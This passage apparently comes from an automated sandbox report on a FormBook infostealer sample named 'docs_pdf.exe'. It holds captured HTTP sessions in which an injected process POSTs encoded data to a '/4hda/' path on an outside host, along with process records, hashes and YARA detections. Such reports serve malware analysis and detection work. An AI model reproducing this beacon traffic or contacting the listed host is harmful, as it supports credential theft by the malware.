and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                  Jul 13, 2024 00:08:53.728641987 CEST | 1236 | IN | Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                  Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                  Jul 13, 2024 00:08:53.728660107 CEST | 1236 | IN | Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                  Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                  Jul 13, 2024 00:08:53.728758097 CEST | 1236 | IN | Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                  Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                  Jul 13, 2024 00:08:53.728774071 CEST | 878 | IN | Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                                  Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  14 | 192.168.2.4 | 49751 | 194.9.94.85 | 80 | 4484 | C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 13, 2024 00:08:55.622361898 CEST | 811 | OUT | POST /4hda/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.xn--matfrmn-jxa4m.se
                                  Origin: http://www.xn--matfrmn-jxa4m.se
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 220
                                  Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 37 74 76 75 57 57 65 48 4d 6a 78 6b 4d 46 37 55 41 6c 75 6c 72 36 58 59 2f 34 57 53 79 56 51 4d 36 6d 44 79 55 74 6d 2b 44 43 78 4d 6e 55 30 68 4a 52 6f 7a 71 4b 35 33 51 76 42 74 44 32 32 64 2b 72 6e 7a 53 43 32 63 33 4b 62 50 65 37 75 41 6a 33 45 6a 56 46 57 5a 73 7a 53 55 34 57 45 71 33 4b 6b 6b 30 43 4c 59 50 6a 4f 5a 4f 74 58 69 36 6e 50 49 45 35 51 50 4b 4a 52 72 6f 2f 4e 74 6d 6c 48 73 73 4f 38 70 34 50 2f 67 4b 7a 32 51 53 67 78 46 46 4f 48 30 77 34 4f 52 4a 79 4d 44 38 49 34 71 37 44 79 2f 52 71 70 6e 34 3d
                                  Data Ascii: tDA=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boF7tvuWWeHMjxkMF7UAlulr6XY/4WSyVQM6mDyUtm+DCxMnU0hJRozqK53QvBtD22d+rnzSC2c3KbPe7uAj3EjVFWZszSU4WEq3Kkk0CLYPjOZOtXi6nPIE5QPKJRro/NtmlHssO8p4P/gKz2QSgxFFOH0w4ORJyMD8I4q7Dy/Rqpn4=
                                  Jul 13, 2024 00:08:56.262490034 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 12 Jul 2024 22:08:56 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: PHP/8.1.24
                                  Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                  Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                  Jul 13, 2024 00:08:56.262523890 CEST | 1236 | IN | Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                  Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                  Jul 13, 2024 00:08:56.262542009 CEST | 1236 | IN | Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                  Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                  Jul 13, 2024 00:08:56.262557030 CEST | 1236 | IN | Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                  Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                  Jul 13, 2024 00:08:56.262574911 CEST | 878 | IN | Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                                  Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  15 | 192.168.2.4 | 49752 | 194.9.94.85 | 80 | 4484 | C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 13, 2024 00:08:58.156059027 CEST | 10893 | OUT | POST /4hda/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.xn--matfrmn-jxa4m.se
                                  Origin: http://www.xn--matfrmn-jxa4m.se
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 10300
                                  Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 6a 74 76 62 43 57 66 6b 30 6a 77 6b 4d 46 67 55 42 69 75 6c 71 34 58 59 33 38 57 53 2b 76 51 4f 53 6d 43 58 41 74 6b 4c 33 43 6f 38 6e 55 32 68 4a 51 73 7a 72 65 35 33 41 72 42 74 7a 32 32 64 2b 72 6e 78 4b 43 67 2b 66 4b 55 76 66 4a 70 41 6a 7a 54 7a 55 69 57 5a 31 4c 53 55 38 73 45 61 58 4b 6b 41 51 43 59 4c 33 6a 4e 35 4f 76 51 69 37 69 50 49 4a 35 51 4f 6e 6c 52 75 55 56 4e 76 36 6c 57 39 73 52 6a 4e 49 4f 73 67 47 4b 31 52 32 52 39 32 56 54 66 30 78 45 44 7a 68 53 64 32 63 46 79 72 65 6f 72 38 4e 62 37 79 50 6d 65 6d 33 2f 67 39 6b 52 5a 36 38 36 4f 59 64 4e 42 77 5a 6d 79 6a 35 78 33 51 2b 79 77 30 51 6e 6d 66 64 70 46 41 75 46 70 58 42 32 45 51 31 78 62 59 72 31 66 59 2b 45 6b 45 46 66 33 51 54 58 69 70 4b 35 69 6b 2f 52 74 4a 49 66 58 53 2b 76 64 53 32 52 6b 75 64 67 6f 30 6c 6e 6a 6b 6c 67 7a 43 32 6e 32 49 4b 30 5a 32 46 62 6e 75 5a 49 6b 68 77 77 2f 6e [TRUNCATED]
                                  Data Ascii: tDA=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boFjtvbCWfk0jwkMFgUBiulq4XY38WS+vQOSmCXAtkL3Co8nU2hJQszre53ArBtz22d+rnxKCg+fKUvfJpAjzTzUiWZ1LSU8sEaXKkAQCYL3jN5OvQi7iPIJ5QOnlRuUVNv6lW9sRjNIOsgGK1R2R92VTf0xEDzhSd2cFyreor8Nb7yPmem3/g9kRZ686OYdNBwZmyj5x3Q+yw0QnmfdpFAuFpXB2EQ1xbYr1fY+EkEFf3QTXipK5ik/RtJIfXS+vdS2Rkudgo0lnjklgzC2n2IK0Z2FbnuZIkhww/nkWim2hmqaT2OphONFeQMYrNBQ1VrkZqo5Fe+PIblPuXmZOwytYQ6Uzw2YGRa/rzQ+dYkLieKKzvIDTPNaHI4sLbLzerzUNaC0/MVLZT37ySpk5CXopLFmdJfVhRcwa4qnf3Z6XHe1RCxMgt+O2tzA/SU7bYvVWcJwysssdO9TPcuF+murPDQHN0WpQdiiJjNew1/U7+BqVoEXIhYW83o/ZXFh9UcKO3+MYz+199jGUI+2blszQQQqrHxvao5WCZNsaGcqOAYVbgQWlTOpTAtp5yMbe29opIqDFrLL0sQLelAjXBT2Cy7EQP2ELzdMPouQkwvUufwxyOTtHhqfqp9MFXVTJc7N0c2123UN7gN8ZctWHe1nIqZN6OTm6yw9UDiknTs8Edr/Zp69waFmdsZIKYSvqNY60QLu4zOXeD9eCtTRa/2DrQ9DBilsmrNaF5rf/0jUcFYokV5aQtfoAX1ROpqBSCH4d3SemCk3f/HHb77DqCufk35+CnN0K/7B4t8cTKAlFTUlFarlhLHYXKb/jWluD/IzP++JQL1qnziFXnhG1jiYS8pRwSEcmF/R4A5IMYKSCSwFXEjRN6uHopYIaXiopH1GgvaF0kx8a5D2ypsRvcFtUvBAAlv62+6uXWdW0eHXhBVRyuISs0NkBNwQ37x5v0LLr25XL [TRUNCATED]
                                  Jul 13, 2024 00:08:58.809704065 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 12 Jul 2024 22:08:58 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: PHP/8.1.24
                                  Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                  Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                  Jul 13, 2024 00:08:58.809750080 CEST | 224 | IN | Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                                  Jul 13, 2024 00:08:58.809787035 CEST | 1236 | IN | Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
                                  Jul 13, 2024 00:08:58.809823036 CEST | 1236 | IN | Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                                  Jul 13, 2024 00:08:58.809855938 CEST | 448 | IN | Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                                  Jul 13, 2024 00:08:58.809891939 CEST | 1236 | IN | Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
                                  Jul 13, 2024 00:08:58.809921980 CEST | 206 | IN | Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                                  Session ID:16
                                  Source IP:192.168.2.4
                                  Source Port:49753
                                  Destination IP:194.9.94.85
                                  Destination Port:80
                                  PID:4484
                                  Process:C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 13, 2024 00:09:00.686052084 CEST | 517 | OUT | GET /4hda/?tDA=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Y2AhR=fDNdZPHH1hsp8rrp HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Host: www.xn--matfrmn-jxa4m.se
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Jul 13, 2024 00:09:01.325706005 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 12 Jul 2024 22:09:01 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: PHP/8.1.24
                                  Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                  Jul 13, 2024 00:09:01.325731993 CEST | 224 | IN | Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                                  Jul 13, 2024 00:09:01.325745106 CEST | 1236 | IN | Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
                                  Jul 13, 2024 00:09:01.325761080 CEST | 1236 | IN | Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                                  Jul 13, 2024 00:09:01.325776100 CEST | 448 | IN | Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                                  Jul 13, 2024 00:09:01.325792074 CEST | 1236 | IN | Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
                                  Jul 13, 2024 00:09:01.325804949 CEST | 206 | IN | Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0



                                  Target ID:0
                                  Start time:18:06:59
                                  Start date:12/07/2024
                                  Path:C:\Users\user\Desktop\docs_pdf.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\docs_pdf.exe"
                                  Imagebase:0xfb0000
                                  File size:1'190'400 bytes
                                  MD5 hash:942C50B985DC1E6EB49C1763D39D398F
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:1
                                  Start time:18:07:00
                                  Start date:12/07/2024
                                  Path:C:\Windows\SysWOW64\svchost.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\docs_pdf.exe"
                                  Imagebase:0x970000
                                  File size:46'504 bytes
                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1842290329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1842290329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:2
                                  Start time:18:07:10
                                  Start date:12/07/2024
                                  Path:C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe"
                                  Imagebase:0xba0000
                                  File size:140'800 bytes
                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2915081115.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2915081115.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  Target ID:3
                                  Start time:18:07:11
                                  Start date:12/07/2024
                                  Path:C:\Windows\SysWOW64\clip.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\SysWOW64\clip.exe"
                                  Imagebase:0x350000
                                  File size:24'576 bytes
                                  MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2913469899.0000000002780000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2913469899.0000000002780000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2915275774.0000000004630000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2915275774.0000000004630000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Reputation:moderate
                                  Has exited:false

                                  Target ID:7
                                  Start time:18:07:24
                                  Start date:12/07/2024
                                  Path:C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe"
                                  Imagebase:0xba0000
                                  File size:140'800 bytes
